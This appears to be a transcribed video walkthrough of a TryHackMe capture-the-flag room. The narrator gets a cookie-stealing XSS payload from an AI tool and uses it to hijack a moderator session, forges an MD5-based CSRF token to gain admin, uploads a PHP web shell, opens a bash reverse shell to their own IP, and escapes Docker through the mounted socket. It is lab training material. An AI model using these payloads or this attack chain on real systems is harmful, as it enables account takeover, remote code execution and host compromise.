Today we are going to do the sequence room from TryHackMe. So I have just created a new parrot machine and we will be doing it from this machine. So all I have done is basically created a new parrot machine and configured ZapGPT. That's all I have done. Now we will try to solve this challenge. I have already done this once, so I know the solution, but we will see how we can solve it. So I have started the room and I have the IP here. So we will start with Nmap. And we will quickly see what we can get from Nmap. It should not take a lot of time because I am scanning only the 1000 ports and not all the 65K ports, so it should not take a lot of time. Okay, so we can see that only port 22 and 80 are open. Generally, SSH is quite hardened and it is not easy to break into SSH, whereas HTTP is something that we should also always look at first. So I'll just copy this IP address and go to my browser and try this. We can see there is a review shop here and there is only one thing that we can do, which is login and password. We don't have this yet, so there's nothing we can do here. There is no register button or anything. Let's try something, right? And if we give a wrong credential, then it just says invalid credential, so there is no way for us to enumerate the user. If it was saying incorrect username, then we know how to enumerate the user, but we cannot do that. Let's go to contact us, and contact us, like any comment pages, are a very good candidate for XSS. So as soon as I see a contact page, the first thing I am trying is XSS. So we will just generate a quickly XSS payload. I want the most basic XSS payload, which can send me the cookies from anyone who visits this page. Let's see if ZapGPT can give us some solution for this. And meanwhile, I will. This is for lab practice. Okay, so we can see here that it is giving us alert document.cookie. We don't want that, so I want it to call me back on my server with the cookie. So we will just make a directory www cd www, and let's see what does it say. Yeah, it gives me a nice script. I will use this, which is fine, and we will say index. Before that, I need the IP address, so we will need this. We will copy this and index.js, paste that IP, and then copy paste this. So here we can put our IP. .13.74.41. Okay, and then we can start Python server or NC. Python is fine because then we can keep it running. So I will just say Python 3 -m http.server, and this will start a server on port 8000. That's all we wanted. Now we can come here. We don't know which one will get us back what we want. So what we can do is we can just say script source equals 10 http://10.10.34.41/index.js, and then we can say /script. So what this is doing is basically wherever this will be rendered, it will make it sure that it includes our script index.js, and index.js will basically call us back with the document.cookies. Alright, so let's try to send this and see if something happens. We will just wait for a couple of seconds. If nothing happens, then we will try something else. So nothing is happening. We can try another thing, which is without actually trying to add our script, we can directly give here log $cookie equals plus document.cookie. So instead of doing a fetch from that script, we are actually directly giving it here, and we will try this as well. And just to verify, I will just try to see if this is reachable or not. This is not reachable because I have not given the port. So let me fix that first, and we will remove this and say :8000 /index.js. In fact, I think we have the same problem in our script also. So I will fix that as well. So I will just report 8000 here. Okay, so now we have this correct. We have the port number 10.13.74.41 is my VPN IP. Let's copy paste this again and send it. Let's wait for a few seconds again. In the meantime, I will try the other option as well. So I will just say :8123. Copy this, send it in all three of them, and send it. And we will wait for a couple of seconds to see what happens. We should ideally get a callback, and we should be able to see what happens. I am expecting that someone will be visiting this page, so we should get a callback. And one more thing I want to test is if I remove this script, because we are giving it in the script tag itself, so there is no need for this script, and start it again, and then we will again call 8000 /index.jsp and send it. Let's wait for a few seconds again to see if we are getting a callback. Are we doing it correctly? 7441 colon 8000 slash index.js. Let's inspect and see in console if we are getting any errors. Also, let's just try this in message also, just in case there is some checks for name and phone number. And let's send this. Okay. And as soon as we do this, we can immediately see that we are getting some messages. And what did we give in it? Okay, we have given HTTPS. So this is the problem. We should fix this and then run this again. Okay, and immediately we can see we are getting a cookie for something. Let's copy this cookie and we will go to storage. We have a PHP session ID here. We'll just replace this with our new cookie and refresh this. We don't want to resend it. We go to home. Okay, we are logged in and we are logged in as mod. So now we have a few more things that we can do, which is we can see the ID, username and role and how many users are there and so on and so forth. Right, so if I go to settings, which seems most interesting to me, I can see that there are two things we can do. One is change password and promote co-admin. Probably this is what we want to do, but before we want to do that, probably what I will do is I'll change the password. Ideally, in pen testing, you would not do this unless you have permissions to do this, and you can get the permission for changing the password before you do this. But this will enable us to ensure that we have persistence and we don't have to rely on doing the XSS again and again to get access to mod user. So I'll just change the password to mod, and now if we are logged out for whatever reason, then we know how to get in. Now, if we go to view feedback, there is nothing other than what we have seen already. The feedback that we have submitted is coming here. And this is probably the reason that it was not showing up earlier, right? The name and phone number were not correct. The message could be empty, but these two probably cannot be empty. We can see that if name and phone number are empty, it is not showing up here. So the other payloads that we submitted are not coming here. Anyway, there is one more option, chat here. So we can go to chat, and here we can see that there are two users and admin seems to be online. So let's go to admin and send the same payload that we have sent earlier. So I'll start this server again, and then I will say script src equals 10.13.10.13.7441 74.41 port 8000, and we need to give HTTP, don't forget that, and we will put it in double quotes /log question mark cookie equals plus document dot key. Or we can actually call index.js also. Let's do that. So we will just say index.js here, and index.js is in fact, if you remember, calling the same thing again, right? So we will just try this, and just for my safekeeping, I'll copy this and send it. It seems to be suspicious, so we will just send the link. Let's see what happens if we just send the link. and we have sent the link. We are getting only the first one, DJ47, nothing new. Actually, let's try to send the image link, right? So we can say image source equals, so we can give the same thing. In fact, we can give it as log question mark cookie equals plus document dot cookie test image, and we'll post the image tag, and let's see what happens. We'll send this. So we are getting suspicious content here. So we need to find out a way so that we don't get suspicious content here. So what else we can try? Uh, we have to try it with a link, and the link can basically include the JavaScript. That's what I am thinking right now. So we can try that. Let's try that. Since we can send a URL, I will just create index.html, and in the index.html we will say script source equals index.js and slash script. Just for something we will say test page. And then we can copy this thing, send this. Does it match the cookie that we have? 8DJ47. Yes, it matches 8DJ47. Nothing. It doesn't look like it is clicking on this page, or at least we are not getting anything from here. So let's see, go back to settings, and let's look at how this promote to admin works, right? So we'll just say inspect to this, and I'll just increase the font for you. So here we have two input values. One is what we are seeing here, and if we just try to say mod and promote to admin, then we are saying this feature is currently only available for admins. So we cannot basically do this, right? Now, did it actually send a... Yeah, we can see that it actually sent a request, and it is sending a CSRF token for promote. Now, if we go back to our inspector, we can see that this is a hidden value, and we can copy this and say echo -n. WC-C. This is 32 characters, so it is highly possible that this could be a MD5 sum. So we will go to just search this, and this is digest value of string mod, right? So it is highly possible that we are sending the actual username, which is sending the request. And if we send it as admin, then it is possible that we might be able to promote our user as admin. So what we will do is echo minus n admin md5 sum. This is the value we get. We'll copy this. So there are multiple ways you can do this. A lot of people would prefer to do it from burp, but we can do it from here also. So I am just modifying the form, and in the form I am changing the value here. And this is a one-time thing that will work, but that is fine. We only want it to be done once. And then I will try to say promote to admin. And if we go to network, we see that there was a request sent, and the response was the feature is only currently admin available for admins. Uh, let's see what else can we do. Okay, but this we cannot run. But let's say that we send this link to the admin itself. So let's copy this value as URL and let's send it in chat to admin. What if he clicks this, right? And let's send this. We get something here which we were not getting earlier. Uh, let's try to refresh the page. Nothing. Let's log out and log in. Since we have set the password, we can log in with mod. Sorry, this didn't work, which is fine. We have the PHP session ID. We can use this. We'll just copy this session ID and change the password again. Storage. Then we can go to cookies and again change our cookie. Refresh this. And we are logged in again. And okay. So what we want to do is first change the password. We'll change the password again to mod. Update the password. And this password didn't get changed, so we can do password 123 mod 123. Okay, password was updated successfully. We have the link in our I have copied the link, right? So let's try sending it as no. We want to copy link. Let's send it as 127.0.0.1. 127.0.0.1. And let's open a new private window here, and we will log in here just to check what happens. So the username is mod, password is mod123. No, still nothing, right? We don't see any changes. Now, the other thing that we can try is uh, changing this to review.thm. And send this link. So username is mod, CSRF token is 21232. Let's verify that this translates to admin. We will quickly verify that we have not made a mistake here. MD5 hash of admin is this. Okay. FC3, yeah, this is correct. So this is fine. Let's again try to log out and log in. Log out, log in, mod 123. Okay, this is good. Now we can see that we have some extra settings. We have the same view feedback. We have open chat settings. But okay, since we are here, we can set the admin password as well. We'll say admin123 as the password for admin. Now we are still mod, so I want to set it back to mod 123. We have admin permissions now, not admin password, right? So we can see chat is there, settings, contact us, THM is there, but now there is a lottery feature, and let's see how this works, right? So inspect web page source, and there was something called lottery. Okay, so we can see there is a lottery.php here. There's nothing else here, and the lottery page is not showing us anything else. It just says that this page is coming soon. So let's see if we can find something else on the web page. There should be something missing that we are not looking at, right? So one of the things that we do not do is run a GoBuster. So let's do that. GoBuster dir this -u minus wop the users share word lists checklist uh, derpy big.text. So let's see if we can find something here. We don't have checklist here. Generally, I use checklist password. So let's search sudo apt search checklist. It is there in Kali, I know for sure, but I'm not used to using checklist. Is there? We can install it. Let's install that checklists. So just in case we don't find anything from here, we can run something with checklists. It should not take a lot of time, probably a couple of few more seconds to find this. If there is anything extra that we have missed. Still waiting for GoBuster to finish as well as checklist to install. This is going a little bit slow, but that's okay. It should not take a long time. Checklist is installed, so we should be able to check with one of the setlists. One of the word list from setlist should be useful for this case, but we will see. Okay, setlist is installed. So we can check where it is installed because I also don't know. It is in user shared setlists. So let me stop this and we will use .103.80 and the IP is correct. Yeah, the IP is correct. Word list is user share setlist discovery with capital web content draft medium words.txt. And I can always give minus T50 to run with multiple threads. And this should go faster. And immediately we find two folders. One is uploads, one is mail. So let's see what is there in those two. I'll copy this URL, open it in a new page, and we'll go to uploads. There is nothing up in uploads. Let's check mail, which looks a juicy folder to have. There is a dump.txt. And this says that I have successfully updated the code. The lottery and finance panels have also been created. This looks similar to what we are talking about here, right? So we are seeing a lottery feature here. So there should be a finance panel also for this. Both features have been placed in a controlled environment to prevent unauthorized access, which is also true because we are not able to access them directly. The finance panel is finance.php and is hosted on an internal network. So this looks like this could be a CSRF. So what we can do is just inspect this and change this lottery.php to finance.php and see if they are on the same server and same place. Finance, and then we will change this to finance. Okay, and immediately we see there is a different page than what we were seeing earlier. Just to make our life easier, I'll just start burp soup C because I guess we will need to try this multiple times, so it will be easier. And if we want to try burp, then one of the other things that I always like is Foxy Proxy Standard. So we will quickly install that as well. Foxy Proxy Standard. We'll enable this. It is here. I will pin it to toolbar. Extensions. Manage. Run in private window allow. Okay. So now we can see it here. We will go to options. Add. We will just say burp CE. HTTP is fine. Proxy IP is 127.0.0.1. Port is 8080. Save. Close. Then I can set it as burp CE. And then we can go back to here. Okay, so now we have the access to finance.php. For now, access is protected with a complicated 8-character alphanumeric password, and we have the password also. So let's copy this password, paste it here, and say unlock. And we should have got a request in burp. No? Okay, but we don't see the request in burp. I don't know why. Probably this didn't send a request to burp. Now we can see the finance page here, and there is a upload latest investor details, and there is a way to upload a file here. Now, since there is a file upload, we can quickly try and see if we can upload a PHP file. So again, I'll just create a shell.php, and we will quickly write a PHP shell script on $_request aka, and close the PHP tag, save it, nc minus lvnp 9001, and see if I can type it correctly. And then we will browse Amiteji www shell.php upload. And now the request is coming to burp. Let's forward it. And we have to give the password again. I hope we have the same password here. Okay, so file uploaded successfully in uploads folder, and we can see it is shell.php. Now we know that this is in a different server, right? So we cannot use what we were doing earlier. Dashboard.php, if we go, it is being uploaded, but let's go to the other one. Yeah, this one. So if we do a lottery feature, we can see that we are getting a request here, and this request is sending lottery.php here. Let's send this to repeater by pressing Ctrl R and change this to uploads shell.php and try to send this and see what happens. So this is what we expected. This is all fine, and we don't see anything here. Yeah, there is unmatched something in cell.php. I think we must have. Yeah, we completely missed system. So we need to upload this again. We'll have to go back to our finance.php. We'll do this cell.php upload, and we have to forward it from proxy. Okay, so the file should have been uploaded again. Let's try. If this doesn't work, probably we'll have to upload a new file name. If it is not able to write the file name, overwrite the file, then we will have to. Yeah, this is working. So now we can see that it's saying undefined array key aka. So let's try to say question mark aka equals id. Send. and we should be able to see the response here. Yes, we can see the response here. Now, just to make our life easier, we will copy paste this here to search box, and then here we'll auto scroll to match whenever it changes, and now we can do what we want. So if we do ls and run send this request, we can see cell.php is there. We can do who am I, root nc minus lvnp 9001, and we can run a shell here, bash minus c, bash minus I, dev tcp 10 14 14 74 51. Was it? Was the IP 10 13 74 41? 10 13 74 41 dash 9001 0 2 and 1, and we will control U this to URL encode. We have the script running. Let's see. 9001. Port number is 9001. I think I have the shell wrong, so we can correct it. Dev shell turn off. Run this again. refshells.com 10.13.74.41 10.13.74.41, and we can copy this now and paste it here. I don't see what was wrong. But I don't see it getting executed. So let's see. Okay, got it. So now we got a shell back, and we can see that we are in a Docker by the hostname itself that we have here. And if we can check hostname, yes, the hostname is weird, so it will be definitely a Docker. If we go to /cd ls minus a, we can see a docker.docker env. Now, the first thing that you want to always check when you get into a Docker is env, to see if there is any password in any of the environment variables, which is very common, by the way. I don't see anything here. The other thing I always check is Docker sock. So if we go to where run, we can see a docker.sock here. So Docker sock is here, and let's see if we have Docker command here. This we don't need. Yeah, Docker command is also here. So what we can do is basically say Docker -h Unix :// and we are in where run docker.sock, right? Where run docker.sock images. We can see that we are able to run commands using this socket, and we are able to see the images that we have here, right? So now we can do whatever we want. And one of the things that we can do is I can say -v slash from the host, since this will be run by Docker daemon and not the Docker client, and which is running on the host. So slash from the host will be mounted on slash mnt here. And I can say that I want to run PHP and I want to execute bash. But I need to give -it also to run it interactively in the foreground. There must be some mistake that I am making. Let's try this again. Docker -h -v. Let's say docker -it -rm, and then I can say -h -v php bash. What parameter is it not liking? It's not liking I. And I don't know why. But let's see if we can run this. No, it doesn't like T also. And why? Okay, I know why it doesn't like docker run -it -rm, and then I should give the command. Now I can give this. Okay, so it is running this, but we need to first give -h and then -it. The input device is not TTY, and we know the solution: Python -c input pty dot spawn bin bash which Python 3. Okay, Python 3 is there, so I can run with Python 3. Python 3 -c, we can copy paste from top, and now we should have a pty, so now we should be able to run this again. Since I have not done the stty raw -echo, I cannot press Ctrl+C. I'll have to wait for it. But once that is done, we can do images again. And I forgot to check the tag. So we'll have to do php colon 8.1 CLI, and then we can do bash. And we are in a Docker container. So now we can do cd-mnt, cd root, and we have the flag.txt. And we can use this flag in our, and we can submit this in our TryHackMe. So that's all I had for today. Thank you, everyone. Bye.